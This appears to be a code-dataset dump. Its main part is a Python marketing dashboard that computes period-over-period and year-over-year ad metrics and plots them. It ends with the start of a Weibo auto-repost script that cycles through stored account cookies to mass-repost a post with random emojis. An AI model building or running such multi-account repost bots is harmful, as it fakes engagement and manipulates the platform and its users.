'Spend TY', 'Spend - LP', 'Spend PoP (Abs)', 'Spend PoP (%)', 'Spend LY', 'Spend YoY (%)',
'Sessions - TY', 'Sessions - LP', 'Sessions PoP (%)', 'Sessions - LY', 'Sessions YoY (%)',
'Bookings - TY', 'Bookings - LP', 'Bookings PoP (%)', 'Bookings PoP (Abs)', 'Bookings - LY', 'Bookings YoY (%)', 'Bookings YoY (Abs)',
'Revenue - TY', 'Revenue - LP', 'Revenue PoP (Abs)', 'Revenue PoP (%)', 'Revenue - LY', 'Revenue YoY (%)', 'Revenue YoY (Abs)',
'CPS - TY',
'CPS - LP', 'CPS PoP (Abs)', 'CPS PoP (%)',
'CPS - LY', 'CPS YoY (Abs)', 'CPS YoY (%)',
'CVR - TY',
'CVR - LP', 'CVR PoP (Abs)', 'CVR PoP (%)',
'CVR - LY', 'CVR YoY (Abs)', 'CVR YoY (%)',
'CPA - TY',
'CPA - LP', 'CPA PoP (Abs)', 'CPA PoP (%)',
'CPA - LY', 'CPA YoY (Abs)', 'CPA YoY (%)'
]]
download_df_1 = df_by_date_combined_dt
return download_df_1
# Second Data Table Update Function
def update_second_datatable(start_date, end_date, category, aggregation):
if start_date is not None:
start_date = dt.strptime(start_date, '%Y-%m-%d')
start_date_string = start_date.strftime('%Y-%m-%d')
if end_date is not None:
end_date = dt.strptime(end_date, '%Y-%m-%d')
end_date_string = end_date.strftime('%Y-%m-%d')
days_selected = (end_date - start_date).days
prior_start_date = start_date - timedelta(days_selected + 1)
prior_start_date_string = datetime.strftime(prior_start_date, '%Y-%m-%d')
prior_end_date = end_date - timedelta(days_selected + 1)
prior_end_date_string = datetime.strftime(prior_end_date, '%Y-%m-%d')
if aggregation == 'Placement type':
df1 = df[(df['Category'] == category)].groupby(['Date', aggregation]).sum()[columns].reset_index()
df_by_date = df1[(df1['Date'] >= start_date_string) & (df1['Date'] <= end_date_string)].groupby([aggregation]).sum()[columns].reset_index()
df_by_date_prior = df1[(df1['Date'] >= prior_start_date_string) & (df1['Date'] <= prior_end_date_string)].groupby([aggregation]).sum()[['Spend TY', 'Sessions - TY', 'Bookings - TY', 'Revenue - TY']].reset_index()
df_by_date_prior.rename(columns={'Spend TY' : 'Spend - LP', 'Sessions - TY' : 'Sessions - LP', 'Bookings - TY' : 'Bookings - LP','Revenue - TY' : 'Revenue - LP'}, inplace=True)
df_by_date_combined = pd.merge(df_by_date, df_by_date_prior, on=[aggregation])
elif aggregation == 'GA Category':
df1 = df.groupby(['Date', aggregation]).sum()[columns].reset_index()
df_by_date = df1[(df1['Date'] >= start_date_string) & (df1['Date'] <= end_date_string)].groupby([aggregation]).sum()[columns].reset_index()
df_by_date_prior = df1[(df1['Date'] >= prior_start_date_string) & (df1['Date'] <= prior_end_date_string)].groupby([aggregation]).sum()[['Spend TY', 'Sessions - TY', 'Bookings - TY', 'Revenue - TY']].reset_index()
df_by_date_prior.rename(columns={'Spend TY' : 'Spend - LP', 'Sessions - TY' : 'Sessions - LP', 'Bookings - TY' : 'Bookings - LP','Revenue - TY' : 'Revenue - LP'}, inplace=True)
df_by_date_combined = pd.merge(df_by_date, df_by_date_prior, on=[aggregation])
df_by_date_combined.rename(columns={'GA Category':'Placement type'}, inplace=True)
elif aggregation == 'Birst Category':
df1 = df.groupby(['Date', aggregation]).sum()[columns].reset_index()
df_by_date = df1[(df1['Date'] >= start_date_string) & (df1['Date'] <= end_date_string)].groupby([aggregation]).sum()[columns].reset_index()
df_by_date_prior = df1[(df1['Date'] >= prior_start_date_string) & (df1['Date'] <= prior_end_date_string)].groupby([aggregation]).sum()[['Spend TY', 'Sessions - TY', 'Bookings - TY', 'Revenue - TY']].reset_index()
df_by_date_prior.rename(columns={'Spend TY' : 'Spend - LP', 'Sessions - TY' : 'Sessions - LP', 'Bookings - TY' : 'Bookings - LP','Revenue - TY' : 'Revenue - LP'}, inplace=True)
df_by_date_combined = pd.merge(df_by_date, df_by_date_prior, on=[aggregation])
df_by_date_combined.rename(columns={'Birst Category':'Placement type'}, inplace=True)
# Calculate Differences on-the-fly
# Calculate Percentage Changes
df_by_date_combined['Spend PoP (Abs)'] = ((df_by_date_combined['Spend TY'] - df_by_date_combined['Spend - LP'])/df_by_date_combined['Spend - LP']) * 100
df_by_date_combined['Spend PoP (Abs)'] = df_by_date_combined.apply(lambda x: "{:,.0f}%".format(x['Spend PoP (Abs)']), axis=1)
df_by_date_combined['Spend YoY (%)'] = ((df_by_date_combined['Spend TY'] - df_by_date_combined['Spend LY'])/df_by_date_combined['Spend LY']) * 100
df_by_date_combined['Spend YoY (%)'] = df_by_date_combined.apply(lambda x: "{:,.0f}%".format(x['Spend YoY (%)']), axis=1)
df_by_date_combined['Sessions PoP (%)'] = ((df_by_date_combined['Sessions - TY'] - df_by_date_combined['Sessions - LP'])/df_by_date_combined['Sessions - LP']) * 100
df_by_date_combined['Sessions PoP (%)'] = df_by_date_combined.apply(lambda x: "{:,.0f}%".format(x['Sessions PoP (%)']), axis=1)
df_by_date_combined['Sessions YoY (%)'] = ((df_by_date_combined['Sessions - TY'] - df_by_date_combined['Sessions - LY'])/df_by_date_combined['Sessions - LY']) * 100
df_by_date_combined['Sessions YoY (%)'] = df_by_date_combined.apply(lambda x: "{:,.0f}%".format(x['Sessions YoY (%)']), axis=1)
df_by_date_combined['Bookings PoP (Abs)'] = (df_by_date_combined['Bookings - TY'] - df_by_date_combined['Bookings - LP'])
df_by_date_combined['Bookings PoP (Abs)'] = df_by_date_combined.apply(lambda x: "{:,.0f}".format(x['Bookings PoP (Abs)']), axis=1)
df_by_date_combined['Bookings YoY (Abs)'] = (df_by_date_combined['Bookings - TY'] - df_by_date_combined['Bookings - LY'])
df_by_date_combined['Bookings YoY (Abs)'] = df_by_date_combined.apply(lambda x: "{:,.0f}".format(x['Bookings YoY (Abs)']), axis=1)
df_by_date_combined['Revenue PoP (Abs)'] = (df_by_date_combined['Revenue - TY'] - df_by_date_combined['Revenue - LP'])
df_by_date_combined['Revenue PoP (Abs)'] = df_by_date_combined.apply(lambda x: "{:,.0f}".format(x['Revenue PoP (Abs)']), axis=1)
df_by_date_combined['Revenue YoY (Abs)'] = (df_by_date_combined['Revenue - TY'] - df_by_date_combined['Revenue - LY'])
df_by_date_combined['Revenue YoY (Abs)'] = df_by_date_combined.apply(lambda x: "{:,.0f}".format(x['Revenue YoY (Abs)']), axis=1)
# Calculate CPS, CR, CPA
df_by_date_combined['CPS - TY'] = np.nan
df_by_date_combined['CPS - LP'] = np.nan
df_by_date_combined['CPS - LY'] = np.nan
df_by_date_combined['CPS PoP (Abs)'] = np.nan
df_by_date_combined['CPS YoY (Abs)'] = np.nan
df_by_date_combined['CVR - TY'] = np.nan
df_by_date_combined['CVR - LP'] = np.nan
df_by_date_combined['CVR - LY'] = np.nan
df_by_date_combined['CVR PoP (Abs)'] = np.nan
df_by_date_combined['CVR YoY (Abs)'] = np.nan
df_by_date_combined['CPA - TY'] = np.nan
df_by_date_combined['CPA - LP'] = np.nan
df_by_date_combined['CPA - LY'] = np.nan
df_by_date_combined['CPA PoP (Abs)'] = np.nan
df_by_date_combined['CPA YoY (Abs)'] = np.nan
df_by_date_combined['CPS - TY'] = np.where((df_by_date_combined['Spend TY'] != 0) & (df_by_date_combined['Sessions - TY'] != 0),\
(df_by_date_combined['Spend TY']/df_by_date_combined['Sessions - TY']), df_by_date_combined['CPS - TY'])
df_by_date_combined['CPS - LP'] = np.where((df_by_date_combined['Spend - LP'] != 0) & (df_by_date_combined['Sessions - LP'] != 0),\
(df_by_date_combined['Spend - LP']/df_by_date_combined['Sessions - LP']), df_by_date_combined['CPS - LP'])
# df_by_date_combined['CPS_PoP_abs_conditional'] =
df_by_date_combined['CPS PoP (Abs)'] = (df_by_date_combined['CPS - TY'] - df_by_date_combined['CPS - LP'])
df_by_date_combined['CPS_PoP_percent_conditional'] = df_by_date_combined['CPS PoP (%)'] = ((df_by_date_combined['CPS - TY'] - df_by_date_combined['CPS - LP'])/df_by_date_combined['CPS - LP'] * 100)
df_by_date_combined['CPS - LY'] = np.where((df_by_date_combined['Spend LY'] != 0) & (df_by_date_combined['Sessions - LY'] != 0),\
(df_by_date_combined['Spend LY']/df_by_date_combined['Sessions - LY']), df_by_date_combined['CPS - LY'])
df_by_date_combined['CPS_YoY_abs_conditional'] = df_by_date_combined['CPS YoY (Abs)'] = (df_by_date_combined['CPS - TY'] - df_by_date_combined['CPS - LY'])
df_by_date_combined['CPS_PoP_percent_conditional'] = df_by_date_combined['CPS YoY (%)'] = ((df_by_date_combined['CPS - TY'] - df_by_date_combined['CPS - LY'])/df_by_date_combined['CPS - LY']) * 100
df_by_date_combined['CVR - TY'] = np.where(((df_by_date_combined['Bookings - TY'] != 0) & (df_by_date_combined['Sessions - TY'] != 0)), \
(df_by_date_combined['Bookings - TY']/df_by_date_combined['Sessions - TY'] * 100), df_by_date_combined['CVR - TY'])
df_by_date_combined['CVR - LP'] = np.where(((df_by_date_combined['Bookings - LP'] != 0) & (df_by_date_combined['Sessions - LP'] != 0)), \
(df_by_date_combined['Bookings - LP']/df_by_date_combined['Sessions - LP'] * 100), df_by_date_combined['CVR - LP'])
df_by_date_combined['CVR_PoP_abs_conditional'] = df_by_date_combined['CVR PoP (Abs)'] = np.where((df_by_date_combined['CVR - TY'].notnull() & df_by_date_combined['CVR - LP'].notnull()), \
((df_by_date_combined['CVR - TY'] - df_by_date_combined['CVR - LP'])), df_by_date_combined['CVR PoP (Abs)'])
df_by_date_combined['CVR_PoP_percent_conditional'] = df_by_date_combined['CVR PoP (%)'] = ((df_by_date_combined['CVR - TY'] - df_by_date_combined['CVR - LP'])/df_by_date_combined['CVR - LP']) * 100
df_by_date_combined['CVR - LY'] = np.where(((df_by_date_combined['Bookings - LY'] != 0) & (df_by_date_combined['Sessions - LY'] != 0)), \
(df_by_date_combined['Bookings - LY']/df_by_date_combined['Sessions - LY'] * 100), df_by_date_combined['CVR - LY'])
df_by_date_combined['CVR_YoY_abs_conditional'] = df_by_date_combined['CVR YoY (Abs)'] = np.where((df_by_date_combined['CVR - TY'].notnull() & df_by_date_combined['CVR - LY'].notnull()), \
((df_by_date_combined['CVR - TY'] - df_by_date_combined['CVR - LY'])), df_by_date_combined['CVR YoY (Abs)'])
df_by_date_combined['CVR_YoY_percent_conditional'] = df_by_date_combined['CVR YoY (%)'] = ((df_by_date_combined['CVR - TY'] - df_by_date_combined['CVR - LY'])/df_by_date_combined['CVR - LY'] * 100)
df_by_date_combined['CPA - TY'] = np.where((df_by_date_combined['Spend TY'] != 0) & (df_by_date_combined['Bookings - TY'] != 0), \
(df_by_date_combined['Spend TY']/df_by_date_combined['Bookings - TY']), df_by_date_combined['CPA - TY'])
df_by_date_combined['CPA - LP'] = np.where((df_by_date_combined['Spend - LP'] != 0) & (df_by_date_combined['Bookings - LP'] != 0), \
(df_by_date_combined['Spend - LP']/df_by_date_combined['Bookings - LP']), df_by_date_combined['CPA - LP'])
df_by_date_combined['CPA_PoP_abs_conditional'] = df_by_date_combined['CPA PoP (Abs)'] = np.where((df_by_date_combined['CPA - TY'] != 0) & (df_by_date_combined['CPA - LP'] != 0), \
(df_by_date_combined['CPA - TY'] - df_by_date_combined['CPA - LP']), df_by_date_combined['CPA PoP (Abs)'])
df_by_date_combined['CPA_PoP_percent_conditional'] = df_by_date_combined['CPA PoP (%)' ] = ((df_by_date_combined['CPA - TY'] - df_by_date_combined['CPA - LP'])/df_by_date_combined['CPA - LP'] * 100)
df_by_date_combined['CPA - LY'] = np.where((df_by_date_combined['Spend LY'] != 0) & (df_by_date_combined['Bookings - LY'] != 0), \
(df_by_date_combined['Spend LY']/df_by_date_combined['Bookings - LY']), df_by_date_combined['CPA - LY'])
df_by_date_combined['CPA_YoY_abs_conditional'] = df_by_date_combined['CPA YoY (Abs)'] = np.where((df_by_date_combined['CPA - TY'] != 0) & (df_by_date_combined['CPA - LY'] != 0), \
(df_by_date_combined['CPA - TY'] - df_by_date_combined['CPA - LY']), df_by_date_combined['CPA YoY (Abs)'])
df_by_date_combined['CPA_YoY_percent_conditional'] = df_by_date_combined['CPA YoY (%)'] = (df_by_date_combined['CPA - TY'] - df_by_date_combined['CPA - LY'])/df_by_date_combined['CPA - LY'] * 100
df_by_date_combined['CPS_PoP_abs_conditional'] = df_by_date_combined['CPS PoP (Abs)']
#### REMEMBER FORMATTING MUST BE DONE AFTER MAKING CALCULATIONS
df_by_date_combined['CPS - TY'] = np.where((df_by_date_combined['CPS - TY'].notnull()), \
df_by_date_combined['CPS - TY'].apply(formatter_currency_with_cents), df_by_date_combined['CPS - TY'])
df_by_date_combined['CPS - LP'] = np.where((df_by_date_combined['CPS - LP'].notnull()), \
df_by_date_combined['CPS - LP'].apply(formatter_currency_with_cents), df_by_date_combined['CPS - LP'])
df_by_date_combined['CPS - LY'] = np.where((df_by_date_combined['CPS - LY'].notnull()), \
df_by_date_combined['CPS - LY'].apply(formatter_currency_with_cents), df_by_date_combined['CPS - LY'])
df_by_date_combined['CPS PoP (Abs)'] = np.where((df_by_date_combined['CPS PoP (Abs)'].notnull()), \
df_by_date_combined['CPS PoP (Abs)'].apply(formatter_currency_with_cents), df_by_date_combined['CPS PoP (Abs)'])
df_by_date_combined['CPS YoY (Abs)'] = np.where((df_by_date_combined['CPS YoY (Abs)'].notnull()), \
df_by_date_combined['CPS YoY (Abs)'].apply(formatter_currency_with_cents), df_by_date_combined['CPS YoY (Abs)'])
df_by_date_combined['CPA - TY'] = np.where((df_by_date_combined['CPA - TY'].notnull()), \
df_by_date_combined['CPA - TY'].apply(formatter_currency_with_cents), df_by_date_combined['CPA - TY'])
df_by_date_combined['CPA - LP'] = np.where((df_by_date_combined['CPA - LP'].notnull()), \
df_by_date_combined['CPA - LP'].apply(formatter_currency_with_cents), df_by_date_combined['CPA - LP'])
df_by_date_combined['CPA - LY'] = np.where((df_by_date_combined['CPA - LY'].notnull()), \
df_by_date_combined['CPA - LY'].apply(formatter_currency_with_cents), df_by_date_combined['CPA - LY'])
df_by_date_combined['CPA PoP (Abs)'] = np.where((df_by_date_combined['CPA PoP (Abs)'].notnull()), \
df_by_date_combined['CPA PoP (Abs)'].apply(formatter_currency_with_cents), df_by_date_combined['CPA PoP (Abs)'])
df_by_date_combined['CPA YoY (Abs)'] = np.where((df_by_date_combined['CPA YoY (Abs)'].notnull()), \
df_by_date_combined['CPA YoY (Abs)'].apply(formatter_currency_with_cents), df_by_date_combined['CPA YoY (Abs)'])
df_by_date_combined['CPA PoP (%)'] = np.where((df_by_date_combined['CPA PoP (%)'].notnull()), \
df_by_date_combined['CPA PoP (%)'].apply(formatter_percent), df_by_date_combined['CPA PoP (%)'])
df_by_date_combined['CPA YoY (%)'] = np.where((df_by_date_combined['CPA YoY (%)'].notnull()), \
df_by_date_combined['CPA YoY (%)'].apply(formatter_percent), df_by_date_combined['CPA YoY (%)'])
df_by_date_combined['CPS PoP (%)'] = np.where((df_by_date_combined['CPS PoP (%)'].notnull()), \
df_by_date_combined['CPS PoP (%)'].apply(formatter_percent), df_by_date_combined['CPS PoP (%)'])
df_by_date_combined['CPS YoY (%)'] = np.where((df_by_date_combined['CPS YoY (%)'].notnull()), \
df_by_date_combined['CPS YoY (%)'].apply(formatter_percent), df_by_date_combined['CPS YoY (%)'])
df_by_date_combined['CVR PoP (%)'] = np.where((df_by_date_combined['CVR PoP (%)'].notnull()), \
df_by_date_combined['CVR PoP (%)'].apply(formatter_percent), df_by_date_combined['CVR PoP (%)'])
df_by_date_combined['CVR YoY (%)'] = np.where((df_by_date_combined['CVR YoY (%)'].notnull()), \
df_by_date_combined['CVR YoY (%)'].apply(formatter_percent), df_by_date_combined['CVR YoY (%)'])
df_by_date_combined['CVR - TY'] = np.where((df_by_date_combined['CVR - TY'].notnull()), \
df_by_date_combined['CVR - TY'].apply(formatter_percent_2_digits), df_by_date_combined['CVR - TY'])
df_by_date_combined['CVR - LP'] = np.where((df_by_date_combined['CVR - LP'].notnull()), \
df_by_date_combined['CVR - LP'].apply(formatter_percent_2_digits), df_by_date_combined['CVR - LP'])
df_by_date_combined['CVR - LY'] = np.where((df_by_date_combined['CVR - LY'].notnull()), \
df_by_date_combined['CVR - LY'].apply(formatter_percent_2_digits), df_by_date_combined['CVR - LY'])
df_by_date_combined['CVR PoP (Abs)'] = np.where((df_by_date_combined['CVR PoP (Abs)'].notnull()), \
df_by_date_combined['CVR PoP (Abs)'].apply(formatter_percent_2_digits), df_by_date_combined['CVR PoP (Abs)'])
df_by_date_combined['CVR YoY (Abs)'] = np.where((df_by_date_combined['CVR YoY (Abs)'].notnull()), \
df_by_date_combined['CVR YoY (Abs)'].apply(formatter_percent_2_digits), df_by_date_combined['CVR YoY (Abs)'])
# Rearrange the columns
df_by_date_combined = df_by_date_combined[[
'Placement type',
'CPS - TY',
'CPS - LP', 'CPS PoP (Abs)', 'CPS PoP (%)',
'CPS - LY', 'CPS YoY (Abs)', 'CPS YoY (%)',
'CVR - TY',
'CVR - LP', 'CVR PoP (Abs)', 'CVR PoP (%)',
'CVR - LY', 'CVR YoY (Abs)', 'CVR YoY (%)',
'CPA - TY',
'CPA - LP', 'CPA PoP (Abs)', 'CPA PoP (%)',
'CPA - LY', 'CPA YoY (Abs)', 'CPA YoY (%)',
'CPS_PoP_abs_conditional', 'CPS_PoP_percent_conditional', 'CPS_YoY_abs_conditional', 'CPS_PoP_percent_conditional',
'CVR_PoP_abs_conditional', 'CVR_PoP_percent_conditional', 'CVR_YoY_abs_conditional', 'CVR_YoY_percent_conditional',
'CPA_PoP_abs_conditional', 'CPA_PoP_percent_conditional', 'CPA_YoY_abs_conditional', 'CPA_YoY_percent_conditional'
]]
data_df = df_by_date_combined.to_dict("rows")
return data_df
######################## FOR GRAPHS ########################
def update_graph(filtered_df, end_date):
if end_date is not None:
end_date = dt.strptime(end_date, '%Y-%m-%d')
end_date_string = end_date.strftime('%Y-%m-%d')
if end_date_string <= '2018-12-29':
current_year = 2018
else:
current_year = 2019
# Calulate YoY Differences
filtered_df['Spend YoY (%)'] = ((filtered_df['Spend TY'] - filtered_df['Spend LY'])/filtered_df['Spend LY']) * 100
filtered_df['Sessions YoY (%)'] = ((filtered_df['Sessions - TY'] - filtered_df['Sessions - LY'])/filtered_df['Sessions - LY']) * 100
filtered_df['Bookings - % - PY'] = ((filtered_df['Bookings - TY'] - filtered_df['Bookings - LY'])/filtered_df['Bookings - LY']) * 100
filtered_df['Revenue - % - PY'] = ((filtered_df['Revenue - TY'] - filtered_df['Revenue - LY'])/filtered_df['Revenue - LY']) * 100
# Calculate CPS, CR, CPA
filtered_df['CPS - TY'] = np.nan
filtered_df['CPS - LY'] = np.nan
filtered_df['% YoY_CPS'] = np.nan
filtered_df['CVR - TY'] = np.nan
filtered_df['CVR - LY'] = np.nan
filtered_df['CVR YoY (Abs)'] = np.nan
filtered_df['CPA - TY'] = np.nan
filtered_df['CPA - LY'] = np.nan
filtered_df['% YoY_CPA'] = np.nan
filtered_df['CPS - TY'] = np.where((filtered_df['Spend TY'] != 0) & (filtered_df['Sessions - TY'] != 0), (filtered_df['Spend TY']/filtered_df['Sessions - TY']), filtered_df['CPS - TY'])
filtered_df['CPS - LY'] = np.where((filtered_df['Spend LY'] != 0) & (filtered_df['Sessions - LY'] != 0), (filtered_df['Spend LY']/filtered_df['Sessions - LY']), filtered_df['CPS - LY'])
filtered_df['% YoY_CPS'] = np.where((filtered_df['CPS - TY'] != 0) & (filtered_df['CPS - LY'] != 0), ((filtered_df['CPS - TY'] - filtered_df['CPS - LY'])/filtered_df['CPS - LY']), filtered_df['% YoY_CPS'])
filtered_df['CVR - TY'] = np.where(((filtered_df['Bookings - TY'] != 0) & (filtered_df['Sessions - TY'] != 0)), (filtered_df['Bookings - TY']/filtered_df['Sessions - TY'] * 100), filtered_df['CVR - TY'])
filtered_df['CVR - LY'] = np.where(((filtered_df['Bookings - LY'] != 0) & (filtered_df['Sessions - LY'] != 0)), (filtered_df['Bookings - LY']/filtered_df['Sessions - LY'] * 100), filtered_df['CVR - LY'])
filtered_df['CVR YoY (Abs)'] = np.where((filtered_df['CVR - TY'].notnull() & filtered_df['CVR - LY'].notnull()), ((filtered_df['CVR - TY'] - filtered_df['CVR - LY'])), filtered_df['CVR YoY (Abs)'])
filtered_df['CPA - TY'] = np.where((filtered_df['Spend TY'] != 0) & (filtered_df['Bookings - TY'] != 0), (filtered_df['Spend TY']/filtered_df['Bookings - TY']), filtered_df['CPA - TY'])
filtered_df['CPA - LY'] = np.where((filtered_df['Spend LY'] != 0) & (filtered_df['Bookings - LY'] != 0), (filtered_df['Spend LY']/filtered_df['Bookings - LY']), filtered_df['CPA - LY'])
filtered_df['% YoY_CPA'] = np.where((filtered_df['CPA - TY'] != 0) & (filtered_df['CPA - LY'] != 0), ((filtered_df['CPA - TY'] - filtered_df['CPA - LY'])/filtered_df['CPA - LY']) * 100, filtered_df['% YoY_CPA'])
# Sessions Graphs
sessions_ty = go.Scatter(
x=filtered_df[(filtered_df['Year'] == current_year)]['Week'],
y=filtered_df[(filtered_df['Year'] == current_year)]['Sessions - TY'],
text='Sessions - TY'
)
sessions_ly = go.Scatter(
x=filtered_df[(filtered_df['Year'] == current_year-1)]['Week'],
y=filtered_df[(filtered_df['Year'] == current_year-1)]['Sessions - TY'],
text='Sessions - LY'
)
sessions_yoy = go.Bar(
x=filtered_df[(filtered_df['Year'] == current_year)]['Week'],
y=filtered_df[(filtered_df['Year'] == current_year)]['Sessions YoY (%)'],
text='Sessions YoY (%)', opacity=0.6
)
# Spend Graphs
spend_ty = go.Scatter(
x=filtered_df[(filtered_df['Year'] == current_year)]['Week'],
y=filtered_df[(filtered_df['Year'] == current_year)]['Spend TY'],
text='Spend TY'
)
spend_ly = go.Scatter(
x=filtered_df[(filtered_df['Year'] == current_year-1)]['Week'],
y=filtered_df[(filtered_df['Year'] == current_year-1)]['Spend TY'],
text='Spend LY'
)
spend_yoy = go.Bar(
x=filtered_df[(filtered_df['Year'] == current_year)]['Week'],
y=filtered_df[(filtered_df['Year'] == current_year)]['Spend YoY (%)'],
text='Spend YoY (%)', opacity=0.6
)
# Bookings Graphs
bookings_ty = go.Scatter(
x=filtered_df[(filtered_df['Year'] == current_year)]['Week'],
y=filtered_df[(filtered_df['Year'] == current_year)]['Bookings - TY'],
text='Bookings - TY'
)
bookings_ly = go.Scatter(
x=filtered_df[(filtered_df['Year'] == current_year-1)]['Week'],
y=filtered_df[(filtered_df['Year'] == current_year-1)]['Bookings - TY'],
text='Bookings - LY'
)
bookings_yoy = go.Bar(
x=filtered_df[(filtered_df['Year'] == current_year)]['Week'],
y=filtered_df[(filtered_df['Year'] == current_year)]['Bookings - % - PY'],
text='Bookings - % - PY', opacity=0.6
)
cpa_ty = go.Scatter(
x=filtered_df[(filtered_df['Year'] == current_year)]['Week'],
y=filtered_df[(filtered_df['Year'] == current_year)]['CPA - TY'],
text='CPA - TY'
)
cpa_ly = go.Scatter(
x=filtered_df[(filtered_df['Year'] == current_year-1)]['Week'],
y=filtered_df[(filtered_df['Year'] == current_year-1)]['CPA - TY'],
text='CPA - LY'
)
cpa_yoy = go.Bar(
x=filtered_df[(filtered_df['Year'] == current_year)]['Week'],
y=filtered_df[(filtered_df['Year'] == current_year)]['% YoY_CPA'],
text='% CPA - YoY', opacity=0.6
)
cps_ty = go.Scatter(
x=filtered_df[(filtered_df['Year'] == current_year)]['Week'],
y=filtered_df[(filtered_df['Year'] == current_year)]['CPS - TY'],
text='CPS - TY'
)
cps_ly = go.Scatter(
x=filtered_df[(filtered_df['Year'] == current_year-1)]['Week'],
y=filtered_df[(filtered_df['Year'] == current_year-1)]['CPS - TY'],
text='CPS - LY'
)
cps_yoy = go.Bar(
x=filtered_df[(filtered_df['Year'] == current_year)]['Week'],
y=filtered_df[(filtered_df['Year'] == current_year)]['% YoY_CPS'],
text='% CPS - YoY', opacity=0.6
)
cr_ty = go.Scatter(
x=filtered_df[(filtered_df['Year'] == current_year)]['Week'],
y=filtered_df[(filtered_df['Year'] == current_year)]['CVR - TY'],
text='CVR - TY'
)
cr_ly = go.Scatter(
x=filtered_df[(filtered_df['Year'] == current_year-1)]['Week'],
y=filtered_df[(filtered_df['Year'] == current_year-1)]['CVR - TY'],
text='CVR - LY'
)
cr_yoy = go.Bar(
x=filtered_df[(filtered_df['Year'] == current_year)]['Week'],
y=filtered_df[(filtered_df['Year'] == current_year)]['CVR YoY (Abs)'],
text='CVR YoY (Abs)', opacity=0.6
)
fig = tools.make_subplots(
rows=6,
cols=1,
shared_xaxes=True,
subplot_titles=( # Be sure to have same number of titles as number of graphs
'Sessions',
'Spend',
'Bookings',
'Cost per Acquisition',
'CPS',
'Conversion Rate'
))
fig.append_trace(sessions_ty, 1, 1) # 0
fig.append_trace(sessions_ly, 1, 1) # 1
fig.append_trace(sessions_yoy, 1, 1) # 2
fig.append_trace(spend_ty, 2, 1) # 3
fig.append_trace(spend_ly, 2, 1) # 4
fig.append_trace(spend_yoy, 2, 1) # 5
fig.append_trace(bookings_ty, 3, 1) # 6
fig.append_trace(bookings_ly, 3, 1) # 7
fig.append_trace(bookings_yoy, 3, 1) # 8
fig.append_trace(cpa_ty, 4, 1) # 9
fig.append_trace(cpa_ly, 4, 1) # 10
fig.append_trace(cpa_yoy, 4, 1) # 11
fig.append_trace(cps_ty, 5, 1) # 12
fig.append_trace(cps_ly, 5, 1) # 13
fig.append_trace(cps_yoy, 5, 1) # 14
fig.append_trace(cr_ty, 6, 1) # 15
fig.append_trace(cr_ly, 6, 1) # 16
fig.append_trace(cr_yoy, 6, 1) # 17
# integer index below is the index of the trace
# yaxis indices below need to start from the number of total graphs + 1 since they are on right-side
# overlaing and anchor axes correspond to the graph number
fig['data'][2].update(yaxis='y7')
fig['layout']['yaxis7'] = dict(overlaying='y1', anchor='x1', side='right', showgrid=False, title='% Change YoY')
fig['data'][5].update(yaxis='y8')
fig['layout']['yaxis8'] = dict(overlaying='y2', anchor='x2', side='right', showgrid=False, title='% Change YoY')
fig['data'][8].update(yaxis='y9')
fig['layout']['yaxis9'] = dict(overlaying='y3', anchor='x3', side='right', showgrid=False, title='% Change YoY')
fig['data'][11].update(yaxis='y10')
fig['layout']['yaxis10'] = dict(overlaying='y4', anchor='x4', side='right', showgrid=False, title='% Change YoY')
fig['data'][14].update(yaxis='y11')
fig['layout']['yaxis11'] = dict(overlaying='y5', anchor='x5', side='right', showgrid=False, title='% Change YoY')
fig['data'][17].update(yaxis='y12')
fig['layout']['yaxis12'] = dict(overlaying='y6', anchor='x6', side='right', showgrid=False, title='% Change YoY')
fig['layout']['xaxis'].update(title='Week of the Year' + ' - ' + str(current_year))
for i in fig['layout']['annotations']:
i['font'] = dict(size=12,
# color='#ff0000'
)
fig['layout'].update(
height= 1500,
# width=750,
showlegend=False,
xaxis=dict(
# tickmode='linear',
# ticks='outside',
# tick0=1,
dtick=5,
ticklen=8,
tickwidth=2,
tickcolor='#000',
showgrid=True,
zeroline=True,
# showline=True,
# mirror='ticks',
# gridcolor='#bdbdbd',
gridwidth=2
),
)
updated_fig = fig
return updated_fig
''' | 67.308733 | 217 | 0.66635 | 8,183 | 54,722 | 4.096419 | 0.032506 | 0.087348 | 0.174696 | 0.327914 | 0.892575 | 0.878792 | 0.854927 | 0.823156 | 0.786552 | 0.765789 | 0 | 0.011067 | 0.146303 | 54,722 | 813 | 218 | 67.308733 | 0.706482 | 1.085121 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
3c3a79b737618608d59d8c871c633a8b41e8d75e | 9,139 | py | Python | auto_repost/main.py | susmote/WeiboTools | 659232b4525bcbedf350da1127d382ff6c6e9e71 | [
"MIT"
] | 3 | 2018-11-11T22:07:23.000Z | 2019-03-08T08:20:31.000Z | auto_repost/main.py | susmote/WeiboTools | 659232b4525bcbedf350da1127d382ff6c6e9e71 | [
"MIT"
] | null | null | null | auto_repost/main.py | susmote/WeiboTools | 659232b4525bcbedf350da1127d382ff6c6e9e71 | [
"MIT"
] | 1 | 2021-08-31T06:44:54.000Z | 2021-08-31T06:44:54.000Z | # -*- coding: utf-8 -*-
"""
Created on 2018/11/4
@author: susmote
"""
import requests
import json
import random
import time
rainbow_word_list = ["😀","😁","🤣","😂","😅","😆","😇","😉","😘","😙","😜","😝","😎","🤗"]
def auto_repost_func(weibolink, repostTopic, account_group, each_repost_count, printToGui , conn):
"""
自动转发系统
:param weibolink: 微博链接
:param account_group: 号组
:param each_comment_count: 单号转发次数
:param outputTextEdit: 输出系统
:return:
"""
printToGui("微博自动转发")
next_rannum = 20
repost_count = 1
begin_time = time.time()
print(time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time())))
printToGui(time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time())))
account_index = 0
while(True):
session = requests.session()
headers = {
"Host": "m.weibo.cn",
"Referer": "https://m.weibo.cn/compose/repost",
"Cookie": account_group[account_index]
}
random_num = random.randint(0, len(rainbow_word_list) - 1)
if(random_num != next_rannum):
next_rannum = random_num
repost_content = rainbow_word_list[next_rannum]+repostTopic
repost_id = int(weibolink[-16:len(weibolink)])
repost_url = "https://m.weibo.cn/api/statuses/repost"
st_url = "https://m.weibo.cn/api/config"
login_data = session.get(st_url, headers=headers).text
login_data_json = json.loads(login_data)["data"]
postdata = {
